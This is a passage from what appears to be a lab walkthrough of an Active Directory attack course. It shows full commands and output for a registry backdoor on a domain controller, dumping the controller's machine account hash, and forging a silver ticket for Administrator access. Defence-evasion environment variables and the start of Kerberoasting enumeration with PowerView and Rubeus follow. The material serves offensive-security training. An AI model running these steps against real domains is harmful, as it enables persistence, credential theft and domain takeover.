tspigKo6POIbcfwIC5w3KXOHMFfVRHqRWz4fWkmNYbgbnau7el3GCbXodjiPzixJbuJn7KDrJP9bGXq9
uu6WR0G7NhhwEXT/4tVsG+BF+O15JNe3GNEmDXoMbSonPhDx06X2mo8Kc81g6t9vS67giPeYTuXNSr1z
omUIuMREKkyBckmTDOkHrMnhoLurm3Hs1nvr7WI/Y037bZitHBh63E6kTnYs5k6tGkRPmvexztEu9SzY
n6eFSm2sDx8cJhN/x3gHNsSxJKpv4t8+A3XHKhZUvX0QnoeukTrTObC522yT/pRybHeRLwo28n9C5Ukq
a5HrQduq1RutTeWU/4HMFU7/eFKC1U3mihxnt5p47WjW6L8r3ZPDPAN+kO34hLOYRcBftx26O35NMVmZ
ng71xu0tpKFVyqQENIm7VVK7q9O/prwHZeUbQhWujt4sY4uSIdlGOzapCM8ucd0KtL2TS9hMsiR7Sibo
GCbn8tfP/Rg80OnsM2cThSVeDmQmYP8mCoSEMaA4ij9WGmKTVNgciJoW0Gd9qA63YceWJ8Ifbj40HK/F
3AL+j08NRxV1UTS0/alBYAS2Xt3Mw5awSgrokG5do8kTHq1gCItkUleyegZifV43/SxhHKQNRV3bbq4f
 +zUNmrwzasCXZhsPn5hJboZlmuiB2ymnxUKhImis0rn3Uuh+4nFtnzQM0aSJT8sJftfI/9Eg0AQ0pQSM
3oBSHJYaYSSHuSvPvm9XQfzIsIGz2SyVb7gVSclLitrs3jVap66R6l5UjjQ9nscZnABlL6fd6WUL1C5g
ubnOdClSa2GDs96F+6dNtC6umuK42rMywSU4MtTPAB9mmwjgYkyrLZbPL0065QpAGGtUxxxlHJzeFUAJ
txR2WSL4lkbIvUgebMFLT9DcA9Co8g719zwWDlvtQO5KMGflQLwtrGR15TOXG9KXfJde81BLlA8ON/OF
1WsHOMhWk0fZXdxonul33mN5PuVxgXbNXP4p9yJEzTPdL7ZbUT5s4CjEyn7ZCB9kWMXKZs/bz/MUXMX0
0ekJo4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEILiSN+4z8D5B
+45BnqCj/vVZ0sE9QIDv/3SEWCDBhxWAoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA3MDIxMzAwMTZaphEYDzIwMjQwNzAyMjMw
MDE2WqcRGA8yMDI0MDcwOTEzMDAxNlqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with the Domain Administrator privileges.

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\RACE.ps1
PS C:\Windows\system32> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student163 -Verbose
VERBOSE: [dcorp-dc : ] Using trustee username 'student163'
VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start
VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring
started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with
Access Mask of 983103
(ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the
trustee WMI object with
user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee
to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling
SetSecurityDescriptor on the
key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring
completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of
983103 (ALL_ACCESS) and
AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object
with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on
the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of
983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object
with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on
the key with the
newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of
983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object
with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on
the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of
983103 (ALL_ACCESS) and
AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object
with user 'student163'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on
the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key
VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags
of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student163'
VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created
Ace
VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103
(ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user
'student163'
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be
set.
At C:\Ad\Tools\RACE.ps1:2268 char:13
+ $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the

newly created Ace
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc] Backdooring completed for system

ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc student163

Now we extract the hash of the machine account of the domain controller.
PS C:\Windows\system32> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc 81a9ccc2f44b988af78448ad78297ad5

Once we have the hash of the machine account of the Domain Controller, we can get silver tickets for
different services on the machine.
C:\Users\student163>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-
dc.dollarcorp.moneycorp.local /rc4:81a9ccc2f44b988af78448ad78297ad5 /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 7/2/2024 10:48:46 AM

[*] StartTime : 7/2/2024 10:48:46 AM
[*] EndTime : 7/2/2024 8:48:46 PM
[*] RenewTill : 7/9/2024 10:48:46 AM

[*] base64(ticket.kirbi):

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
cnAubW9uZXljb3JwLmxvY2Fs

[+] Ticket successfully imported!

C:\Users\student163>klist

Current LogonId is 0:0x14f4b9

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 7/2/2024 10:48:46 (local)
End Time: 7/2/2024 20:48:46 (local)
Renew Time: 7/9/2024 10:48:46 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Users\student163>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
07/02/2024 10:08 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,019,624,960 bytes free
Domain Privilege Escalation
Kerberoasting
Kerberoasting is a post-compromise attack technique for cracking passwords associated with service
accounts in Microsoft Active Directory. The attacker impersonates an account user with a service principal
name (SPN) and requests a service-related ticket. They then crack the password hash linked to that service
account, log in with the plaintext credentials, and advance the attack.

• Offline Cracking of Service account passwords

• The Kerberos session ticket has a server portion which is encrypted with the password hash of the
service account. This makes it possible to request a ticket and do offline password attack.

As a side note Host SPNs aren’t vulnerable to Kerberoasting attacks because the password is a long,
complex key that is refreshed every 30 days or less.

How Kerberoasting Works

Service Principal Name (SPN) Enumeration
The attacker enumerates the SPNs in the domain. SPNs are unique identifiers for services running on
servers and are used by Kerberos for authentication.

Requesting Service Tickets

The attacker requests a service ticket (TGS - Ticket Granting Service) for a targeted service account using
the SPNs. This request does not require elevated privileges and can be performed by any domain user.

Retrieving Encrypted Service Tickets

The Kerberos Key Distribution Center (KDC) issues the service ticket encrypted with the service account's
NTLM hash. The attacker receives the encrypted ticket.

Offline Brute-Forcing
The attacker extracts the encrypted portion of the ticket and performs an offline brute-force attack to
crack the NTLM hash, revealing the service account’s password.

Enumeration
Using PowerView
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\AD\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainUser -SPN

pwdlastset : 11/11/2022 9:59:41 PM

logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
showinadvancedviewonly : True
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 11/12/2022 6:14:52 AM
instancetype : 4
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
objectguid : 956ae091-be8d-49da-966b-0daa8d291bb2
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/12/2022 5:59:41 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16
AM}
serviceprincipalname : kadmin/changepw
usncreated : 12300
usnchanged : 12957
memberof : CN=Denied RODC Password Replication
Group,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
cn : krbtgt
msds-supportedencryptiontypes : 0
objectsid : S-1-5-21-719815819-3726368948-3917688648-502
primarygroupid : 513
iscriticalsystemobject : True
name : krbtgt

logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

logoncount : 60
badpasswordtime : 5/18/2024 4:20:37 AM
description : Account to be used for services which need high privileges.
distinguishedname : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : svc admin
lastlogontimestamp : 5/17/2024 10:34:40 PM
userprincipalname : svcadmin
samaccountname : svcadmin
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:34:40 AM
instancetype : 4
usncreated : 40118
objectguid : 244f9c84-7e33-4ed6-aca1-3328d0802db0
sn : admin
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 11/14/2022 5:06:37 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 5:15:01 PM, 11/14/2022 5:06:37 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
givenname : svc
usnchanged : 439083
memberof : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 5/18/2024 7:24:47 AM
badpwdcount : 0
cn : svc admin
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-719815819-3726368948-3917688648-1118
primarygroupid : 513
pwdlastset : 11/14/2022 9:06:37 AM
name : svc admin

Using Active Directory Module

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\Ad\Tools\ADModule-

master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\Ad\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> Get-ADUser -Filter { ServicePrincipalName -like '*' } -Properties
ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc

DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin

PS C:\Windows\system32> Get-ADUser -Filter { ServicePrincipalName -ne "$null" } -Properties

ServicePrincipalName
DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc

DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin

Using Rubeus
We will use Rubeus for Kerberoasting.

List Kerberos stats

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /stats

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
